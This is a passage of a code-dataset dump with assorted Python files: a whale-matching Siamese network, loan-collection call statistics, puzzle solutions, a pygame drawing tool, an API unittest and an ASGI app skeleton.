torchvision.models.squeezenet1_1(pretrained=True)\n train_batch_size = 8\n val_batch_size = 8\n dl_workers = 0\nelse:\n train_batch_size = 64\n val_batch_size = 256\n dl_workers = 4\nseed = 1\n\nemb_len = 128\ndiff_method = 1\n\nroot_path = '../input/'\nif debug == 1:\n train_path = '../input/train1_224/'\n test_path = '../input/test1_224/'\nelif debug == 2:\n train_path = '../input/train2_224/'\n test_path = '../input/test2_224/'\nelse:\n train_path = '../input/train_224/'\n test_path = '../input/test_224/'\n\n\ndf0 = pd.read_csv('../input/train.csv')\ndf_new = df0[df0.Id == 'new_whale']\ndf_known = df0[df0.Id != 'new_whale']\nif debug:\n train_list = train_list_dbg\n val_list = val_list_dbg\nelse:\n train_list, val_list = split_whale_set(df0, nth_fold=0, new_whale_method=1, seed=1)\nprint(len(train_list), len(val_list))\n\nim_count = df0[df0.Id != 'new_whale'].Id.value_counts()\nim_count.name = 'sighting_count'\nex_df = df0.join(im_count, on='Id')\n\npath2fn = lambda path: re.search('\\w*\\.jpg$', path).group(0)\nfn2label = {row[1].Image: row[1].Id for row in df0.iterrows()}\nclass_dict = make_whale_class_dict(df0)\nfile_lut = df0.set_index('Image').to_dict()\n\nim_tfms = get_transforms(do_flip=False, max_zoom=1, max_warp=0, max_rotate=2)\n\n\ndata = (\n ImageItemList\n # .from_df(df_known, 'data/train', cols=['Image'])\n .from_folder(train_path)\n # .split_by_idxs(train_item_list, val_item_list)\n .split_by_valid_func(lambda path: path2fn(str(path)) in val_list)\n # .split_by_idx(val_list)\n # .random_split_by_pct(seed=SEED)\n .label_from_func(lambda path: fn2label[path2fn(str(path))])\n #.add_test(ImageItemList.from_folder(test_path))\n .transform([None, None], size=im_size, resize_method=ResizeMethod.SQUISH)\n #.transform(im_tfms, size=im_size, resize_method=ResizeMethod.SQUISH)\n .databunch(bs=train_batch_size, num_workers=dl_workers, path=root_path)\n #.normalize(imagenet_stats)\n)\n\ndata.add_tfm(normalize_batch)\n\ntrain_dl = DataLoader(\n SiameseDs(data.train_ds),\n batch_size=train_batch_size,\n shuffle=True,\n #collate_fn=siamese_collate,\n num_workers=dl_workers\n)\n\ndata_v = (\n ImageItemList\n # .from_df(df_known, 'data/train', cols=['Image'])\n .from_folder(train_path)\n # .split_by_idxs(train_item_list, val_item_list)\n .split_by_valid_func(lambda path: path2fn(str(path)) in val_list)\n # .split_by_idx(val_list)\n # .random_split_by_pct(seed=SEED)\n .label_from_func(lambda path: fn2label[path2fn(str(path))])\n .add_test(ImageItemList.from_folder(test_path))\n #.transform([None, None], size=im_size, resize_method=ResizeMethod.SQUISH)\n #.transform(im_tfms, size=im_size, resize_method=ResizeMethod.SQUISH)\n .databunch(bs=train_batch_size, num_workers=dl_workers, path=root_path)\n .normalize(imagenet_stats)\n)\n\n#v = SimpleDataset(data.valid)\nvalid_dl = DataLoader(\n SimpleDataset(data_v.valid_ds),\n batch_size=val_batch_size,\n shuffle=False,\n drop_last=False,\n num_workers=dl_workers\n)\n\ntest_dl = DataLoader(\n SimpleDataset(data_v.test_ds),\n batch_size=val_batch_size,\n shuffle=False,\n drop_last=False,\n num_workers=dl_workers\n)\n\nref_dl = DataLoader(\n SimpleDataset(data_v.train_ds),\n batch_size=val_batch_size,\n shuffle=False,\n #collate_fn=siamese_collate,\n num_workers=dl_workers\n)\n\ndata_bunch = ImageDataBunch(train_dl, valid_dl, fix_dl=ref_dl)\n\n'''\ndata_bunch.train_dl = DataLoaderTrain1(train_dl, device, tfms=im_tfms[0], collate_fn=collate_siamese)\n#data_bunch.valid_dl = DataLoaderMod(valid_dl, None, None, siamese_collate)\ndata_bunch.valid_dl = DataLoaderVal(valid_dl, device, tfms=None, collate_fn=data_collate)\ndata_bunch.test_dl = DataLoaderVal(test_dl, device, tfms=None, collate_fn=data_collate)\ndata_bunch.fix_dl = DataLoaderVal(ref_dl, device, tfms=None, collate_fn=data_collate)\n#data_bunch.add_tfm(normalize_batch)\n#data_bunch.valid_dl = None\n'''\n\n#for batch in data_bunch.train_dl:\n# print(len(batch))\n# break\n#for batch in data_bunch.fix_dl:\n# print(len(batch))\n# break\n#\n#exit()\n\n#siamese = SiameseNet(emb_len, arch=arch, width=im_size, height=im_size, diff_method=diff_method)\nsiamese = SiameseNetwork(arch=arch)\n\n# new_whale should not be involved in positive distance\nnew_whale_idx = find_new_whale_idx(data.train_ds.y.classes)\n#new_whale_idx = find_new_whale_idx(data_v.valid_ds.y.classes)\n#triploss = TripletLoss(margin=0.2)\ncontrastive_loss = ContrastiveLoss(margin=1.0)\n\nlearn = LearnerEx(data_bunch,\n siamese,\n enable_validate=False,\n loss_func=BCEWithLogitsFlat(),\n #loss_func=contrastive_loss,\n #metrics=[lambda preds, targs: accuracy_thresh(preds.squeeze(), targs, sigmoid=False)]\n )\n\nlearn.load(f'res18-siamese-stage-2')\nlearn.model.to(device)\n\nmap5, top5_matrix, pos_dist_max, neg_dist_min = siamese_mat(valid_dl, learn.model, ref_dl,\n pos_mask=[0], ref_idx2class=ref_dl.ds.y,\n target_idx2class=valid_dl.ds.y)\n\nprint(map5, pos_dist_max, neg_dist_min)\n\n","sub_path":"backup/siamese_t.py","file_name":"siamese_t.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"153543462","text":"# -*- coding:utf-8 -*-\n\nimport logging\nimport datetime\n\nfrom bottle import get\n\nfrom bomber.models_readonly import (\n CallActionsR,\n ApplicationR,\n RepaymentLogR,\n NewCdrR\n)\nfrom bomber.models import AutoIVRActions, Contact\nfrom bomber.constant_mapping import Cycle, ApplicationStatus\nfrom bomber.auth import check_api_user\nfrom bomber.plugins import ip_whitelist_plugin\nfrom bomber.utils import plain_query\n\n\n@get('/api/v1/calc/callactions/', skip=[ip_whitelist_plugin])\ndef calc_call_actions_for_goden_eye(application_id):\n \"\"\"\n 根据application_id获取用户上次逾期数据,计算相关数据\n \"\"\"\n check_api_user()\n args = plain_query()\n finished_at = args.get(\"finished_at\")\n result = {}\n # application没有,ivr中也可能有数据\n is_ivrjt_res = calc_is_get_through_auto_ivr(application_id, finished_at)\n result.update(is_ivrjt_res)\n application = (ApplicationR\n .select(ApplicationR.id, ApplicationR.user_id,\n ApplicationR.finished_at, ApplicationR.created_at)\n .where(ApplicationR.id == application_id,\n ApplicationR.status == ApplicationStatus.REPAID.value)\n .first())\n if not application:\n # ivr表示还款之前,没进bomber的打电话记录\n result[\"is_lsbr_bff\"] = is_ivrjt_res[\"is_ivrjt\"]\n return {\"data\": result}\n try:\n call_actions_res = calc_call_actions(application, result[\"is_ivrjt\"])\n result.update(call_actions_res)\n newcdr_self_and_ec_res = calc_newcdr_self_and_ec_num(application)\n result.update(newcdr_self_and_ec_res)\n except Exception as e:\n logging.error(\n \"calc_call_actions_for_goden_eye is defeated,appid:%s,error:%s\" % (\n application_id, str(e)))\n return {\"data\": result}\n return {\"data\": result}\n\n\n# 计算calc_keys中的字段\ndef calc_call_actions(application=None, is_lsbr_bff=0):\n result = {}\n if not application:\n logging.info(\"calc_call_cations is defeated, application is none\")\n return result\n # 获取催收等级是1a的通话记录\n call_actions = (CallActionsR\n .select()\n .where(CallActionsR.cycle == Cycle.C1A.value,\n CallActionsR.application_id == application.id)\n .order_by(-CallActionsR.created_at)\n )\n # 获取到还款完成的前三天和前七天的时间\n finish_three_day = application.finished_at + datetime.timedelta(days=-3)\n finish_seven_day = application.finished_at + datetime.timedelta(days=-7)\n # 获取还款信息\n repayment_logs = get_repayment_log(application)\n # 记录是否以获取到还款前最后一个通话\n is_before_finish_last_contact = False\n overdue_ptp_KP_dict = {}\n result.update({\"br_tercnt\": 0,\n \"br_jtcnt\": 0,\n \"ec_jtcnt\": 0,\n \"klec_num\": 0,\n \"yxec_num\": 0,\n \"hlec_num\": 0,\n \"klec_tercnt\": 0,\n \"od_ptp_cnt\": 0,\n \"od_kp_cnt\": 0\n })\n for call in call_actions:\n if call.phone_status == 4 and call.real_relationship == 1:\n result[\"is_brcont\"] = 1\n result[\"br_jtcnt\"] += 1\n # 计算还款完成前3天和前7天的是否联系到本人\n if call.created_at > finish_seven_day:\n result[\"is_brjt_bf7laf\"] = 1\n if call.created_at > finish_three_day:\n result[\"is_brjt_bf3laf\"] = 1\n if call.commit == 1:\n result[\"br_tercnt\"] += 1\n elif call.phone_status == 4 and call.real_relationship in (2, 3, 4):\n result[\"ec_jtcnt\"] += 1\n result[\"klec_num\"] += 1\n if call.connect_applicant == 1:\n result[\"yxec_num\"] += 1\n if call.help_willing != 2:\n result[\"hlec_num\"] += 1\n if call.commit == 1:\n result[\"klec_tercnt\"] += 1\n else:\n pass\n if call.admit_loan == 1:\n result[\"is_od_nal\"] = 1\n if call.overdue_reason:\n overdue_reason_key = \"is_od_rs%s\" % call.overdue_reason\n result[overdue_reason_key] = 1\n if call.pay_willing:\n pay_willing_key = \"is_pw%s\" % call.pay_willing\n result[pay_willing_key] = 1\n if call.pay_ability:\n pay_ability_key = \"is_pa%s\" % call.pay_ability\n result[pay_ability_key] = 1\n # 计算下p次数\n if call.promised_date:\n result[\"od_ptp_cnt\"] += 1\n KP_key = \"%s-%s\" % (call.created_at.strftime(\"%Y%m%d%H%M%S\"),\n call.promised_date.strftime(\"%Y%m%d%H%M%S\"))\n for repayment in repayment_logs:\n if KP_key in overdue_ptp_KP_dict:\n break\n else:\n call_promised_date = datetime.datetime.strptime(\n call.promised_date.strftime(\"%Y-%m-%d 23:59:59\"),\n \"%Y-%m-%d %H:%M:%S\")\n if (call.created_at <= repayment.repay_at and\n repayment.repay_at <= call_promised_date):\n overdue_ptp_KP_dict[KP_key] = 1\n result[\"od_kp_cnt\"] += 1\n # 如果创建时间小于等于完成时间,并且before_finish_last_contact为空,\n # 说明是还款前最后一次接通的通话是否是本人\n if not (is_before_finish_last_contact and\n call.created_at <= application.finished_at and\n call.phone_status == 4):\n is_before_finish_last_contact = True\n if call.real_relationship == 1:\n result[\"is_lsbr_bff\"] = 1\n else:\n result[\"is_lsbr_bff\"] = 0\n # 如果没有call_actions,要看ivr的值,ivr表示没进bomber前给本人大的电话\n if \"is_lsbr_bff\" not in result:\n result[\"is_lsbr_bff\"] = is_lsbr_bff\n return result\n\n\n# 计算拨打本人电话数和ec电话数\ndef calc_newcdr_self_and_ec_num(application=None):\n result = {\"br_cacnt\": 0, \"ec_cacnt\": 0}\n if not application:\n logging.info(\n \"calc_newcdr_self_and_ec_num is defeated, application is none\")\n return result\n # 获取处理后的手机号\n self_number, ec_number = handle_contact_num(application)\n if not any((self_number, ec_number)):\n logging.info(\n \"get user_id=:%s contact number is null\" % application.user_id)\n return result\n number = self_number + ec_number\n # 获取newCdr中的通话记录\n newcdrs = NewCdrR.select(NewCdrR.callto).where(\n NewCdrR.loanid == str(application.id),\n NewCdrR.callto << number)\n for newcdr in newcdrs:\n if newcdr.callto in self_number:\n result[\"br_cacnt\"] += 1\n else:\n result[\"ec_cacnt\"] += 1\n return result\n\n\n# 处理得到的手机号NewCdrR中的手机号加0\ndef handle_contact_num(application=None):\n if not application:\n logging.info(\"handle_contact_num is defeated, application is none\")\n return False, False\n # 获取符合条件的电话,本人(relationship=0),ec=(relationship=1,source=ec)\n contacts = (Contact\n .select(Contact.number, Contact.relationship)\n .where(Contact.user_id == application.user_id,\n (Contact.relationship == 0) |\n (Contact.relationship == 1 & Contact.source == 'ec'))\n )\n self_number, ec_number = [], []\n # 处理电话\n for call in contacts:\n # 去除手机号为空的情况\n if not call.number:\n continue\n c_numbers = call.number.split(\",\")\n for c in c_numbers:\n new_c = c.replace(\"+62\", \"\")\n new_c = new_c.replace(\"-\", \"\")\n # NewCdrR中的手机号加0\n new_c = \"0{}\".format(new_c)\n if call.relationship == 0:\n self_number.append(new_c)\n else:\n ec_number.append(new_c)\n # 两个手机号列表去重\n self_number = list(set(self_number))\n ec_number = list(set(ec_number))\n return self_number, ec_number\n\n\n# 获取还款信息\ndef get_repayment_log(appllcation=None):\n if not appllcation:\n logging.info(\"calc_repayment_log is defeated, application is none\")\n return False\n repayment_logs = RepaymentLogR.select().where(\n RepaymentLogR.application_id == appllcation.id)\n # 18年10月以前的数据有重复,key=》appllicaiton_id-repay_at\n repayment_logs = {\"{}-{}\".format(r.application_id, r.repay_at.strftime(\n \"%Y-%m-%d %H:%M:%S\")): r for r in repayment_logs}\n repayment_logs = repayment_logs.values()\n return repayment_logs\n\n\n# 催收ivr是否接通,如果未进bomber之前也要获取到还款前三天和前七天是否接通本人\ndef calc_is_get_through_auto_ivr(application_id=None, finished_at=None):\n result = {\"is_ivrjt\": 1,\n \"is_brjt_bf3laf\": 0,\n \"is_brjt_bf7laf\": 0\n }\n if not application_id:\n logging.info(\n \"calc_is_get_through_auto_ivr is defeated, application is none\")\n return result\n auto_ivr_actions = AutoIVRActions.select().where(\n AutoIVRActions.loanid == int(application_id),\n AutoIVRActions.callstate == 1)\n if finished_at:\n if isinstance(finished_at, str):\n finished_at = datetime.datetime.strptime(finished_at,\n \"%Y-%m-%d %H:%M:%S\")\n finished_three_days = finished_at + datetime.timedelta(days=-3)\n finished_seven_days = finished_at + datetime.timedelta(days=-7)\n for auto_ivr in auto_ivr_actions:\n if auto_ivr.created_at >= finished_seven_days:\n result[\"is_brjt_bf7laf\"] = 1\n if auto_ivr.created_at >= finished_three_days:\n result[\"is_brjt_bf3laf\"] = 1\n break\n if not auto_ivr_actions:\n result[\"is_ivrjt\"] = 0\n return result\n","sub_path":"bomber/controllers/golden_eye.py","file_name":"golden_eye.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"112073908","text":"#. Count consecutive characters say example i/p: aaabcdddd o/p: 3a1b1c4d\ns=input(\"enter the input:\")\ni = 0\nwhile (i < len(s) - 1):\n # Counting occurrences of s[i]\n count = 1\n while s[i] == s[i + 1]:\n i += 1\n count += 1\n if i + 1 == len(s):\n break\n print(str(s[i]) + str(count),end=\" \")\n i += 1\nprint()\n\n# Python3 code to demonstrate\n# each occurrence frequency using\ndef fun():\n str=input(\"enter the input:\")\n freq = {}\n for i in str:\n if i in freq:\n freq[i] += 1\n else:\n freq[i] = 1\n print(freq)\nfun()\n","sub_path":"py_pgm/count consucative char.py.py","file_name":"count consucative char.py.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"118064936","text":"import hashlib\n\nf = open('./2015/input/aoc2015_04.txt', 'r')\n\ndata = f.readlines()\n\ndef check_hash(_hash, num_of_zeros):\n if _hash.hexdigest()[:num_of_zeros] == '0'*num_of_zeros:\n return True\n\ndef part_1(dat):\n i = 0\n while True:\n i += 1\n md5 = hashlib.md5(f\"{dat[0]}{i}\".encode('utf-8'))\n if check_hash(md5, 5):\n return i\n\ndef part_2(dat):\n i = 0\n while True:\n i += 1\n md5 = hashlib.md5(f\"{dat[0]}{i}\".encode('utf-8'))\n if check_hash(md5, 6):\n return i\n\nprint(part_1(data))\nprint(part_2(data))\n","sub_path":"2015/aoc2015_04.py","file_name":"aoc2015_04.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"164739590","text":"#!/usr/bin/python3.7\n\nfrom itertools import permutations\nfrom queue import SimpleQueue\n\nCURSOR_STEPS = {1: 4, 2: 4, 3: 2, 4: 2, 5: 3, 6: 3, 7: 4, 8: 4, 99: 1}\n\nwith open('input.txt') as f:\n intcode = [int(x) for x in f.readline().strip().split(',')]\n\nclass Computer:\n def __init__(self):\n self.intcode = intcode.copy()\n self.cursor = 0\n self.input = SimpleQueue()\n\n @staticmethod\n def parse_instructions(code):\n code = '0' * (5 - len(str(code))) + str(code)\n op = int(code[-2:])\n modes = [int(x) for x in code[:-2]][::-1]\n return op, modes\n \n def put(self, val):\n self.input.put(val)\n\n def process(self):\n \"\"\"\n Evaluates intcode until output or halt\n \"\"\"\n while True:\n intcode = self.intcode\n opcode, modes = self.parse_instructions(intcode[self.cursor])\n\n # The literal ints passed into the function\n args = intcode[self.cursor : self.cursor + CURSOR_STEPS[opcode]]\n\n # The value of the ints passed into the function\n vals = []\n for i in range(CURSOR_STEPS[opcode]-1):\n if modes[i]:\n # literal mode\n vals.append(args[i + 1])\n else:\n # pointer mode\n vals.append(intcode[args[i + 1]])\n\n # if only python had switch ;(\n if opcode == 99:\n raise StopIteration\n elif opcode == 1:\n # addition\n intcode[args[3]] = vals[0] + vals[1]\n elif opcode == 2:\n # multiplication\n intcode[args[3]] = vals[0] * vals[1]\n elif opcode == 3:\n # input\n intcode[args[1]] = self.input.get()\n elif opcode == 4:\n # output\n self.cursor += 2\n return vals[0]\n elif opcode == 5:\n # jump if true\n if vals[1] != 0:\n self.cursor = vals[1]\n continue\n elif opcode == 6:\n # jump if false\n if vals[1] == 0:\n self.cursor = vals[1]\n continue\n elif opcode == 7:\n # less than\n intcode[args[3]] = 1 if vals[0] < vals[1] else 0\n elif opcode == 8:\n # equal to\n intcode[args[3]] = 1 if vals[0] == vals[1] else 0\n else:\n raise Exception(f'No such opcode: {opcode}')\n\n # print(f'\\nOpcode: {opcode}, Args: {args}, Modes: {modes}, Vals: {vals}, Step: {CURSOR_STEPS[opcode]}')\n # input('press any key to continue')\n self.cursor += CURSOR_STEPS[opcode]\n\ndef part1():\n max_output = float('-inf')\n for perm in permutations(range(0, 5)):\n amps = []\n for i in range(len(perm)):\n # Setup the computers\n amps.append(Computer())\n amps[i].put(perm[i])\n\n output = 0\n halt = False\n while not halt:\n for i in range(len(perm)):\n amps[i].put(output)\n try:\n output = amps[i].process()\n except StopIteration:\n halt = True\n max_output = max(output, max_output)\n print(f'Part 1: {max_output}')\n\ndef part2():\n max_output = float('-inf')\n for perm in permutations(range(5, 10)):\n amps = []\n for i in range(len(perm)):\n # Setup the computers\n amps.append(Computer())\n amps[i].put(perm[i])\n\n output = 0\n halt = False\n while not halt:\n for i in range(len(perm)):\n amps[i].put(output)\n try:\n output = amps[i].process()\n except StopIteration:\n halt = True\n max_output = max(output, max_output)\n print(f'Part 2: {max_output}')\n\n\npart1()\npart2()\n","sub_path":"2019/7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"6714037","text":"#!/usr/bin/python\n\n# How many followers do you have?\nimport urllib.request\nimport re\n\nfeeds = [\n 'centosproject',\n 'centos'\n ];\nfor feed in feeds:\n response = urllib.request.urlopen('https://twitter.com/' + feed)\n html = response.read().decode('utf-8')\n print ( feed + ': ' + re.search('.*?([\\d,]+ Followers).*', html).group(1) )\n\n","sub_path":"scripts/followers.py","file_name":"followers.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"426695443","text":"\n__author__ = 'kemele'\nimport abc\nimport json\nfrom fedsdm.rdfmt import MTManager\n\n\nclass ConfigSimpleStore(object):\n\n def __init__(self, graph, endpoint, update, user, passwd):\n self.federation = graph\n self.endpoint = endpoint\n self.update = update\n self.user = user\n self.password = passwd\n self.mgr = MTManager(endpoint, user, passwd, graph)\n self.rdfmts = {}\n self.predidx = {}\n self.predidx = {}\n\n def createPredicateIndex(self):\n pidx = {}\n for m in self.rdfmts:\n preds = self.rdfmts[m]['predicates']\n for p in preds:\n if p['predicate'] not in pidx:\n pidx[p['predicate']] = set()\n pidx[p['predicate']].add(m)\n else:\n pidx[p['predicate']].add(m)\n\n return pidx\n\n def findbypreds(self, preds):\n res = []\n if len(self.predidx) == 0:\n self.predidx = self.mgr.get_preds_mt()\n for p in preds:\n if p in self.predidx:\n res.append(self.predidx[p])\n if len(res) != len(preds):\n return {}\n for r in res[1:]:\n res[0] = set(res[0]).intersection(set(r))\n if len(res) > 0:\n mols = list(res[0])\n return {m: self.mgr.get_rdfmt(m) for m in mols}\n else:\n return {}\n\n def find_rdfmt_by_preds(self, preds):\n if len(self.rdfmts) > 0:\n return self.findbypred(preds)\n res = self.mgr.get_rdfmts_by_preds(preds)\n return res\n\n def findbypred(self, pred):\n res = self.mgr.get_rdfmts_by_preds([pred])\n return res.keys()\n\n def findMolecule(self, molecule):\n if molecule in self.rdfmts:\n return self.rdfmts[molecule]\n rdfmt = self.mgr.get_rdfmt(molecule)\n return rdfmt\n\n def load_rdfmt(self, rdfclass):\n if rdfclass in self.rdfmts:\n return self.rdfmts[rdfclass]\n rdfmt = self.mgr.get_rdfmt(rdfclass)\n return rdfmt\n\n # def findMolecules(self, preds):\n","sub_path":"fedsdm/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"504650436","text":"import json\n\nfrom util import listToJson\n\nif __name__ == '__main__':\n courses: list = json.load(open('_pawsCourse.raw.json', 'r'))\n\n scheduleTypes = set()\n for course in courses:\n scheduleTypes.update(course['scheduleTypes'])\n\n scheduleTypes = list(scheduleTypes)\n\n listToJson(scheduleTypes, 'scheduleType')\n","sub_path":"scheduleType.py","file_name":"scheduleType.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"630491993","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\n\"\"\"\n\nDescription: This package reads variables\n and creates basic truth tables.\n Used in app.py.\n\nAuthor: Fenz Daniel\n\nDate: 29.10.2015\n\"\"\"\n\n\n# -------------------------- functions -----------------------------\n\ndef createTruthTable(variables):\n truthTable_dict = {} # Final product of this function, storing the truth table\n # In the end will look something like this:\n # {a : [True, True, False, False], b : [True, False, True, False]}\n\n boolean = True # This will get added to the truth table and switch between True & False\n index = 0 # Marks which of the tables gets worked on\n count = len(variables)\n valuesCount = 2 ** count # How many values there will be per variable\n\n for i in range(count, 0, -1): # Runs in reverse because this works backwards\n # to simulate how truth tables are created normally\n\n switch = (2 ** i) // 2 # Switch marks after how many additions to an truth list of a variable\n # the programm needs to switch bool value\n\n for iteration in range(1, valuesCount + 1):\n if variables[index] in truthTable_dict:\n truthTable_dict[variables[index]].append(boolean)\n else:\n truthTable_dict[variables[index]] = [boolean]\n\n if iteration % switch == 0:\n boolean = not boolean\n index += 1 # index runs with the highest for-loop, because that loop runs backwards\n\n return truthTable_dict\n\n\n\n","sub_path":"src/create_truth_table.py","file_name":"create_truth_table.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"554507762","text":"\"\"\"Basic Drawing Program\"\"\"\n\n\n# import pygame library so we can use it!\nimport pygame\n\n# run initialization code on the library\npygame.init()\n\n# setup display dimensions\ndisplay_width = 1000\ndisplay_height = 1000\n\ngameSurface = pygame.display.set_mode((display_width, display_height))\n# pygame.display.set_caption('Window Caption!')\n\n# setup game resources\n# color definitions\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (240, 240, 240)\nRED = (200, 0, 0)\nGREEN = (0, 200, 0)\nBLUE = (0, 0, 200)\n\n# variables\n# current mouse position and previouse mouse position\nmouseX = 0\nmouseY = 0\npMouseX = 0\npMouseY = 0\n# size variable for drawing tool\nsize = 10\n# Array of colors we can switch between\ncolorArray = [RED, GREEN, BLUE, WHITE]\ncolorNum = 0\n\n# set background once at the beginning\ngameSurface.fill(WHITE)\n\n# main game loop\nrunning = True # when running is True game loop will run\nwhile running == True:\n\n # fill entire screen (clear background)\n # gameSurface.fill(255)\n\n # get input events and respond to them\n # if event is .QUIT\n for event in pygame.event.get():\n print(event)\n if event.type == pygame.QUIT:\n running = False\n\n # handle input events\n elif event.type == pygame.KEYDOWN:\n # clear screen\n if event.key == pygame.K_SPACE:\n gameSurface.fill(WHITE)\n # change colors\n if event.key == pygame.K_1:\n colorNum = 0\n if event.key == pygame.K_2:\n colorNum = 1\n if event.key == pygame.K_3:\n colorNum = 2\n if event.key == pygame.K_0:\n colorNum = 3\n # change size of circles\n if event.key == pygame.K_MINUS:\n size -= 1\n if size < 1:\n size = 1\n if event.key == pygame.K_EQUALS: # really the + key without shift\n size += 1\n\n # print(pygame.mouse.get_pos()) #print mouse position to console\n\n # this needs to constantly update so move out of mouse if statement\n pmouseX, pmouseY = pygame.mouse.get_rel()\n mouseX, mouseY = pygame.mouse.get_pos()\n\n # use state checking to determine if mouse is pressed every frame\n # if the right button is pressed\n if pygame.mouse.get_pressed() == (1, 0, 0):\n\n\n # pygame.draw.circle(gameSurface, colorArray[arrayPosition], (mouseX, mouseY), size)\n # pmouseX,pmouseY = pygame.mouse.get_rel() # this needs to constantly update so move out of mouse if statement\n pygame.draw.line(gameSurface, colorArray[colorNum], (mouseX - pmouseX, mouseY - pmouseY), (mouseX, mouseY),\n size)\n # pygame.draw.circle(gameSurface, colorArray[arrayPosition], (mouseX, mouseY), size)\n # if the right button is pressed\n if pygame.mouse.get_pressed() == (0, 0, 1):\n pygame.draw.circle(gameSurface, colorArray[colorNum], (mouseX, mouseY), size)\n\n # update and redraw entire screen\n pygame.display.flip()\n # update some of the screen\n # pygame.display.update()\n","sub_path":"Extras/Old Class Files/pygame/pygame4Drawing.py","file_name":"pygame4Drawing.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"439300013","text":"#coding:utf-8\nimport unittest\nimport re\nimport json\nimport HTMLTestRunner\nfrom demo1 import RunMain\nclass TestMethod(unittest.TestCase):\n u'''demo'''\n def setUp(self):\n self.run = RunMain()\n def test_01(self):\n u'''验证码登录接口'''\n host = \"http://192.168.1.238:9998\"\n url = host+\"/poipoi/users/login/phone\"\n headers = {\n 'Content-Type':'application/json',\n \"Accept\": \"*/*\"\n }\n body = {\n \"deviceType\": 1,\n \"phone\": \"12000000001\",\n \"verifyCode\": \"120000\"\n }\n res = self.run.run_main('POST',url,headers,body)\n # print(res)\n self.assertEqual(res.json()['status'],200,'测试失败')\n #globals()['变量名称']=值 设置为全局变量\n globals()['userId']=re.findall('\"userId\":(.+?),',res.text)[0]\n globals()['token']=re.findall('\"token\":\"(.+?)\"',res.text)[0]\n # print(userId,token)\n # @unittest.skip('test_02') #容器 跳过\n def test_02(self):\n u'''访问个人信息接口'''\n host = \"http://192.168.1.238:9998\"\n url = host+\"/poipoi/users/info\"\n headers = {\n 'Content-Type':'application/json',\n \"Accept\": \"*/*\",\n 'userId':userId,\n 'token':token\n }\n res = self.run.run_main('GET',url,headers)\n # print(res.text)\n # print(res.content.decode(\"UTF-8\"))\n self.assertEqual(res.json()['status'],200,'测试失败')\nif __name__ == \"__main__\":\n # unittest.main()\n\n #报告地址\n filepath = \"C:\\\\wsl\\\\AutoTest\\\\\\\\auto_python2\\\\report\\\\html_report.html\"\n fp = open(filepath,'wb')\n #创建容器,进行运行\n suite = unittest.TestSuite()\n suite.addTest(TestMethod('test_01'))\n suite.addTest(TestMethod('test_02'))\n # unittest.TextTestRunner().run(suite)\n runner = HTMLTestRunner.HTMLTestRunner(fp,verbosity=2,title=\"接口测试报告\",description=\"demo_POI接口测试报告\")\n runner.run(suite)\n\n\n'''\nunittest面试:\n1.如何使用python开发测试框架?\n-使用request包\n-unittest框架 断言,判断 case的跳过skip\\依赖\\执行范围\n-生成测试报告 HtmlTestRunner\n-数据的存储 表格,数据库\n-集成 git+jenkins\n2.如何管理case?\n-unittest框架 断言,判断 case的跳过\\依赖\\执行范围\n-excel管理\n3.简述Case的执行\nsetUp\ntearDown\nsetUpClass\ntearDownClass\ntest_01\ntest_02\n4.如何解决case的依赖\n-设置全局变量 通过正则表达式或引用的方式,输出为全局变量 globals()['变量名称']=值 \n或存储数据库/配置文件\n5.如何生成测试报告\n下载HtmlTestRunner文件,放置在python安装目录的lib下\n结合unittest,设置报告目录,输出报告\n'''","sub_path":"auto_python2/base/test_method2.py","file_name":"test_method2.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119930729","text":"from . import router, structure\nimport logging\n\n\nclass App:\n '''\n The App class is used as the app.\n\n It which will be used for all activities.\n This requires a `Router` to be attached for serving responses accordingly.\n To instantiate a `name` value is also needed.\n The __call__ function has the ASGI app.\n '''\n\n def __init__(\n self,\n router: router.Router,\n response: structure.Response = structure.Response()\n ):\n def startup():\n pass\n\n def shutdown():\n pass\n\n self.config = {\n \"startup\": startup,\n \"shutdown\": shutdown,\n \"logger\": logging.debug,\n \"router_config\": {\n \"logger_exception\": logging.error,\n \"logger_info\": logging.info,\n \"404Response\": structure.Response404(),\n \"405Response\": structure.Response405(),\n \"500Response\": structure.Response500()\n },\n }\n self.router = router\n router.config = self.config[\"router_config\"]\n self.response = response\n\n# Websocket implementation yet to do.\n async def __call__(self, scope, receive, send):\n '''This will be serving as the ASGI app.\n The information about request will ge gained from the `scope` argument and response will be sent by `send`\n\n Args:\n self: The App class\n scope: The `scope` to communicate as per ASGI specification.\n recieve: ASGI recieve function\n send: ASGI send function\n '''\n# HTTP\n if scope[\"type\"] == \"http\":\n body = b''\n if scope[\"method\"] in self.router.bodied_methods:\n more_body = True\n while more_body:\n message = await receive()\n body += message.get(\"body\", b\"\")\n more_body = message.get(\"more_body\", False)\n\n response_ = await self.router.handle(\n structure.Request(\n method=scope[\"method\"],\n path=scope[\"path\"],\n headers=scope[\"headers\"],\n raw_query=scope[\"query_string\"],\n raw_body=body\n ),\n 